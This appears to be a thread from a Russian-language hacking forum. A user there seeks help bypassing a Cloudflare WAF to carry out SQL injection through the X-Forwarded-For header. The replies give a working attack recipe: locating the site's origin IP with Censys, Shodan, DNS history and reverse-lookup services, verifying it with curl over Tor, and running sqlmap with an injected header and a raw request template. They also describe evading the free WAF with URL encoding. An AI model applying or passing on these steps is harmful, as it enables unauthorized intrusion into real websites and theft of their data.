• XSS.stack #1 – первый литературный журнал от юзеров форума

Нужен человек который обойдёт waf от Claud в X-Forwarded-For (SQL Injection)

Нужен человек который обойдёт waf от Cloudflare в X-Forwarded-For (SQL Injection)
Ваще не особо важен уязвимый параметр. Важен прямой ip за CDN клауда. Самый простой способ: вбей домен site.com (без www) в https://search.censys.io или https://www.shodan.io/host/site.com + https://www.shodan.io/domain/site.com, посмотри на https://viewdns.info/iphistory/site.con в истории, или если есть акк на https://securitytrails.com и\или https://api.hackertarget.com/reverseiplookup/?q=1.1.1.1 пробей на ip сабдомены.
Проверяешь ip
curl -k https://127.0.0.1 -H "Host: site.com" -l (--proxy socks5://127.0..1:9050 , лучше сразу чекать через тор) - если реквест отдает сурс индекса сайта, то ты нашел прямой ip.
В мап
-u https://127.0.0.1 (ip сайта) --headers "X-Forwarded-For: param*" --host "site.com" и остальные кеи
или
-r (путь к текстовику с запросом)
GET (ip сайта) HTTP/1.1
Host: site com
X-Forwarded-For: param*

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

Вообще ищи на форуме "Обход cloudflare". Есть много инфы по теме. Тебе не с мапом надо разбираться, а с вафлей, точнее с прямым ip.
 
Последнее редактирование:
Тебе не с мапом надо разбираться, а с вафлей, точнее с прямым ip.
Не всегда возможно найти прямой IP. Когда я для своего проекта решил поднять CF первым делом что я сделал так это заказал новый IP с "чистой историей". Обойти WAF из бесплатного пакета не так сложно, пройти челенж и на полученых куках елементарный urlencode выручает в 99% случаев. Но если там куплен один из планов WAF гараздо сложнее.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх
Предварительный просмотр